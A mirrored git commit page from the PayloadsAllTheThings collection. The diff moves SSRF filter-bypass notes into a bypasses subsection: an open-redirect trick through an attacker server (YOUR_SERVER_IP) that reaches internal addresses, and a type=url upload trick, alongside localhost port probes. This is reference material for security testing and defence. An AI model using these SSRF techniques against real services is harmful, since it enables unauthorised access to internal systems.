mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Moved bypasses under the bypasses section
This commit is contained in:
parent
6d37ad9e2e
commit
c39c904c9a
@ -79,22 +79,6 @@ http://localhost:443
|
||||
http://localhost:22
|
||||
```
|
||||
|
||||
Advanced exploit [using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection)
|
||||
|
||||
```powershell
|
||||
1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1)
|
||||
2. Launch the SSRF pointing to vulnerable.com/index.php?url=http://YOUR_SERVER_IP
|
||||
vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
|
||||
```
|
||||
|
||||
Advanced exploit using type=url
|
||||
|
||||
```powershell
|
||||
Change "type=file" to "type=url"
|
||||
Paste URL in text field and hit enter
|
||||
Using this vulnerability users can upload images from any image URL = trigger an SSRF
|
||||
```
|
||||
|
||||
## Bypassing filters
|
||||
|
||||
### Bypass using HTTPS
|
||||
@ -237,6 +221,22 @@ http://127.1.1.1:80#\@127.2.2.2:80/
|
||||
|
||||
![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true)
|
||||
|
||||
### Bypassing using other tricks
|
||||
[using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection)
|
||||
|
||||
```powershell
|
||||
1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1)
|
||||
2. Launch the SSRF pointing to vulnerable.com/index.php?url=http://YOUR_SERVER_IP
|
||||
vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
|
||||
```
|
||||
|
||||
Using type=url
|
||||
|
||||
```powershell
|
||||
Change "type=file" to "type=url"
|
||||
Paste URL in text field and hit enter
|
||||
Using this vulnerability users can upload images from any image URL = trigger an SSRF
|
||||
```
|
||||
|
||||
## SSRF exploitation via URL Scheme
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user